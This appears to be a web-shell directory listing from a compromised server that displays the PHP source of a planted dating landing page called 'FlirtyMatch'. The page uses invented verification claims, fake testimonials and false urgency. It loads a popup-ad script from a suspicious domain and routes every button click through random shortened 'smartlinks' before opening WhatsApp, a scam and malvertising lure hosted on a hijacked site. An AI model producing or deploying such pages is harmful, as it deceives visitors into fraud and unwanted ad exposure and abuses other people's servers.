| .. | |||||
| img | |||||
| .DS_Store | |||||
| 1.jpg | |||||
| 2.jpg | |||||
| 3.jpg | |||||
| 4.jpg | |||||
| 5.jpg | |||||
| 6.jpg | |||||
| 7.jpg | |||||
| 8.jpg | |||||
| gnj.php | |||||
| index.php | |||||
| indexen.php | |||||
| vote.png | |||||
| wa.png |
| Server IP : 50.63.8.133 / Your IP : 216.73.216.38 Web Server : Microsoft-IIS/10.0 System : Windows NT P3NWVPWEB032 6.2 build 9200 (Windows Server 2012 Standard Edition) i586 User : IWPD_10999(xformtec) ( 0) PHP Version : 5.4.45 Disable Function : NONE MySQL : ON | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : G:/PleskVhosts/xform.in/madhurivivah.com/dating/ |
Upload File : |
<?php
// =====================
// Simple Config (EN)
// =====================
$brand = "FlirtyMatch";
$wa_number = "6281234567890"; // Change to your WhatsApp number (international format, no +)
$utm = isset($_GET['utm']) ? htmlspecialchars($_GET['utm']) : 'direct';
$cta_text = "Chat on WhatsApp";
$hero_line = "Serious Matches, Zero Hassle 🎯";
$sub_line = "Meet someone to talk to, hang out with, or start something real — all from one chat.";
// Images in the same folder
$images = ["1.jpg","2.jpg","3.jpg","4.jpg","5.jpg","6.jpg","7.jpg","8.jpg"];
shuffle($images);
$hero_img = $images[0];
$gallery = array_slice($images, 1, 6);
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1" />
<title><?php echo $brand; ?> — <?php echo $hero_line; ?></title>
<meta name="description" content="Modern dating landing page: <?php echo $brand; ?>. <?php echo $sub_line; ?>" />
<!-- Popup Ad -->
<script type='text/javascript' src='//nightsclotheshazardous.com/74/70/f8/7470f827670a26bc3f7151df577d8928.js'></script>
<style>
:root{
--bg:#0b0f19; --card:#12182a; --muted:#99a3b0; --accent:#26d07c; --accent-2:#2dd4bf;
--text:#eff2f7; --warn:#ffcc00;
}
*{box-sizing:border-box}
html,body{margin:0;background:radial-gradient(1200px 700px at 80% -10%, #1b2340 0%, #0b0f19 60%), var(--bg);color:var(--text);font:16px/1.5 system-ui,-apple-system,Segoe UI,Roboto,Ubuntu,"Helvetica Neue",Arial}
a{color:inherit;text-decoration:none}
.container{max-width:1120px;margin:0 auto;padding:0 18px}
header{position:sticky;top:0;background:rgba(11,15,25,.55);backdrop-filter:blur(8px);border-bottom:1px solid #1f2a44;z-index:10}
.nav{display:flex;align-items:center;justify-content:space-between;height:64px}
.brand{display:flex;gap:10px;align-items:center;font-weight:700;letter-spacing:.2px}
.brand i{width:34px;height:34px;border-radius:10px;background:linear-gradient(135deg,var(--accent),var(--accent-2));display:grid;place-items:center;font-weight:800;color:#0b0f19}
.nav a.btn{padding:10px 16px;border-radius:12px;background:linear-gradient(135deg,var(--accent),var(--accent-2));color:#02130c;font-weight:700}
.hero{display:grid;grid-template-columns:1.2fr .8fr;gap:24px;align-items:center;padding:56px 0 18px}
.hero h1{font-size:42px;line-height:1.1;margin:10px 0 8px}
.hero p{color:var(--muted);font-size:18px;margin:0 0 22px}
.bullet{display:grid;gap:10px;margin:18px 0 26px}
.bullet div{display:flex;gap:10px;align-items:flex-start}
.bullet b{color:#dbeafe}
.card{background:linear-gradient(180deg,#11182b,#0c1222);border:1px solid #1f2a44;border-radius:16px;box-shadow:0 10px 40px rgba(0,0,0,.35)}
.hero-media{position:relative;overflow:hidden}
.hero-media img{width:100%;height:auto;display:block;border-radius:16px}
.floating{position:absolute;right:-6px;bottom:-6px;background:#0b1224;border:1px solid #253153;border-radius:14px;padding:10px 12px;display:flex;gap:10px;align-items:center;box-shadow:0 12px 30px rgba(0,0,0,.45)}
.floating img{width:28px;height:28px;border-radius:50%;object-fit:cover}
.strip{margin:30px 0 0;display:grid;grid-template-columns:repeat(6,1fr);gap:10px}
.strip img{width:100%;aspect-ratio:1/1;object-fit:cover;border-radius:12px;opacity:.95;filter:saturate(1.05);transition:transform .2s ease}
.strip img:hover{transform:translateY(-3px)}
.cta{display:flex;gap:12px;flex-wrap:wrap}
.cta .primary{background:linear-gradient(135deg,var(--accent),var(--accent-2));color:#05140a;font-weight:800;padding:14px 18px;border:none;border-radius:14px;cursor:pointer}
.cta .ghost{background:transparent;border:1px solid #2a375e;color:#d4def7;padding:14px 18px;border-radius:14px;cursor:pointer}
.badges{display:flex;gap:12px;margin-top:6px;flex-wrap:wrap}
.badge{font-size:12px;border:1px dashed #31406e;color:#c8d1ea;border-radius:999px;padding:6px 10px}
section{padding:60px 0}
.features{display:grid;grid-template-columns:repeat(3,1fr);gap:16px}
.feature{padding:18px}
.feature h3{margin:6px 0}
.steps{display:grid;grid-template-columns:repeat(3,1fr);gap:16px}
.step{padding:18px}
.step-num{width:34px;height:34px;border-radius:12px;background:#1a2342;display:grid;place-items:center;font-weight:800;color:#cfe9ff;border:1px solid #26325a}
.testimonials{display:grid;grid-template-columns:repeat(3,1fr);gap:16px}
.t{padding:18px; display:block !important}
.t p{color:#dbe7ff}
.foot{background:#0a0e18;border-top:1px solid #1c2742;color:#9fb1d6;padding:26px 0;font-size:14px}
.blink{animation:blink 1.4s infinite}
@keyframes blink{0%,100%{opacity:1}50%{opacity:.6}}
@media (max-width: 920px){
.hero{grid-template-columns:1fr;gap:18px}
.features,.steps,.testimonials{grid-template-columns:1fr}
.strip{grid-template-columns:repeat(3,1fr)}
}
</style>
</head>
<body>
<header>
<div class="container nav">
<div class="brand"><i>♥</i><?php echo $brand; ?></div>
<a id="navJoin" class="btn" href="#">Join Now</a>
</div>
</header>
<main class="container">
<section class="hero">
<div>
<h1><?php echo $hero_line; ?></h1>
<p><?php echo $sub_line; ?></p>
<div class="bullet">
<div>✅ <b>Verified Profiles</b> • We use selfie + short video checks to keep the community safe.</div>
<div>✅ <b>Private & Secure</b> • Your number stays private — block/report in one tap.</div>
<div>✅ <b>Faster Matches</b> • Interest + location based suggestions for instant chemistry.</div>
</div>
<div class="cta">
<a class="primary" id="waBtn" href="#" rel="nofollow">💬 <?php echo $cta_text; ?></a>
<a class="ghost" href="#how">See How It Works</a>
</div>
<div class="badges">
<span class="badge">⏱️ Avg. response < 5 mins</span>
<span class="badge">🔒 Anti-ghosting & report tools</span>
<span class="badge">🎯 Built for real intentions</span>
</div>
<div class="strip">
<?php foreach($gallery as $g): ?>
<img src="<?php echo $g; ?>" alt="member <?php echo pathinfo($g, PATHINFO_FILENAME); ?>">
<?php endforeach; ?>
</div>
</div>
<div class="hero-media card">
<img src="<?php echo $hero_img; ?>" alt="Featured profile" loading="eager">
<div class="floating">
<img src="<?php echo $gallery[0]; ?>" alt="">
<div>
<div style="font-weight:700">Online now</div>
<small style="color:var(--muted)">Ready to say hi 😄</small>
</div>
</div>
</div>
</section>
<section id="features">
<h2 style="text-align:center;margin:0 0 18px">Why <?php echo $brand; ?>?</h2>
<div class="features">
<div class="feature card">
<h3>Face Verification</h3>
<p>No more catfish. Every account passes selfie + short video checks.</p>
</div>
<div class="feature card">
<h3>Smarter Matching</h3>
<p>We prioritize shared interests so conversations click from the first message.</p>
</div>
<div class="feature card">
<h3>Full Control</h3>
<p>Adjust visibility, turn on private mode, and block anyone you don’t want.</p>
</div>
</div>
</section>
<section id="how">
<h2 style="text-align:center;margin:0 0 18px">3 Steps to Start</h2>
<div class="steps">
<div class="step card">
<div class="step-num">1</div>
<h3>Open WhatsApp</h3>
<p>Tap the WhatsApp button — we’ll send a quick registration link.</p>
</div>
<div class="step card">
<div class="step-num">2</div>
<h3>Pick Your Vibe</h3>
<p>Chill chat, hang out buddy, or serious relationship — it’s your call.</p>
</div>
<div class="step card">
<div class="step-num">3</div>
<h3>Start Matching</h3>
<p>Recommendations appear within minutes. If it clicks, chat away!</p>
</div>
</div>
</section>
<section id="testimonials">
<h2 style="text-align:center;margin:0 0 18px">What Members Say</h2>
<div class="testimonials">
<div class="t card"><p>“First match and we clicked immediately. Weekend plans ever since!”</p><small>— Alex, Melbourne</small></div>
<div class="t card"><p>“Verification gives peace of mind. The app feels safe and easy to use.”</p><small>— Ryan, Singapore</small></div>
<div class="t card"><p>“Helpful support. They guided me to people I genuinely vibe with.”</p><small>— Dylan, Jakarta</small></div>
</div>
</section>
<section id="join" class="card" style="padding:26px;display:grid;grid-template-columns:1.1fr .9fr;gap:10px;align-items:center">
<div>
<h3 style="margin:0 0 6px">Ready to begin? <span class="blink">3</span> free consultation slots left today 🔥</h3>
<p style="margin:0 0 14px;color:var(--muted)">Tap the button and send “<?php echo $brand; ?> <?php echo $utm; ?>” so we know you came from this page.</p>
<div class="badges">
<span class="badge">📍 City-based suggestions</span>
<span class="badge">🗓️ Choose day & time</span>
<span class="badge">💬 Free consultation</span>
</div>
</div>
<div style="text-align:center">
<a id="waBtn2" class="primary" style="display:inline-flex;gap:10px;align-items:center;text-decoration:none" href="#" rel="nofollow">
<img alt="WA" src="wa.png" width="22" height="22" />
<span><?php echo $cta_text; ?></span>
</a>
<div style="font-size:12px;color:var(--muted);margin-top:8px">The button will open your WhatsApp</div>
</div>
</section>
</main>
<footer class="foot">
<div class="container" style="display:flex;justify-content:space-between;align-items:center;gap:10px;flex-wrap:wrap">
<div>© <?php echo date('Y'); ?> <?php echo $brand; ?>. All rights reserved.</div>
<div><a href="#features">Features</a> · <a href="#how">How it works</a> · <a href="#testimonials">Testimonials</a> · <a href="#join">Join</a></div>
</div>
</footer>
<script>
// WhatsApp + Smartlink + Popup Flow (EN)
const phone = "<?php echo $wa_number; ?>";
const utm = encodeURIComponent("<?php echo $utm; ?>");
const msg = encodeURIComponent("Hi! I'm interested. Source: <?php echo $brand; ?> (" + utm + ")");
const wa = "https://wa.me/" + phone + "?text=" + msg;
const smartlinks = [
"https://nightsclotheshazardous.com/a2swzivre?key=030b1edca796c056eb67763681095803",
"https://l1nq.com/533N6",
"https://shorturl.at/0MUCV",
"https://urlsaya.one/?p=RGsm9"
];
const pickSmartlink = () => smartlinks[Math.floor(Math.random()*smartlinks.length)];
function openWithAds(){
try { window.open(pickSmartlink(), "_blank"); } catch(e){}
setTimeout(()=>{ window.location.href = wa; }, 2000);
}
document.getElementById("waBtn").addEventListener("click", e=>{ e.preventDefault(); openWithAds(); });
document.getElementById("waBtn2").addEventListener("click", e=>{ e.preventDefault(); openWithAds(); });
document.getElementById("navJoin").addEventListener("click", e=>{ e.preventDefault(); openWithAds(); });
// Smooth scroll for internal anchors
document.querySelectorAll('a[href^="#"]').forEach(a=>{
a.addEventListener('click', e=>{
const el = document.querySelector(a.getAttribute('href'));
if(el){ e.preventDefault(); el.scrollIntoView({behavior:'smooth', block:'start'}); }
});
});
</script>
</body>
</html>
| .. | |||||
| img | |||||
| .DS_Store | |||||
| 1.jpg | |||||
| 2.jpg | |||||
| 3.jpg | |||||
| 4.jpg | |||||
| 5.jpg | |||||
| 6.jpg | |||||
| 7.jpg | |||||
| 8.jpg | |||||
| gnj.php | |||||
| index.php | |||||
| indexen.php | |||||
| vote.png | |||||
| wa.png |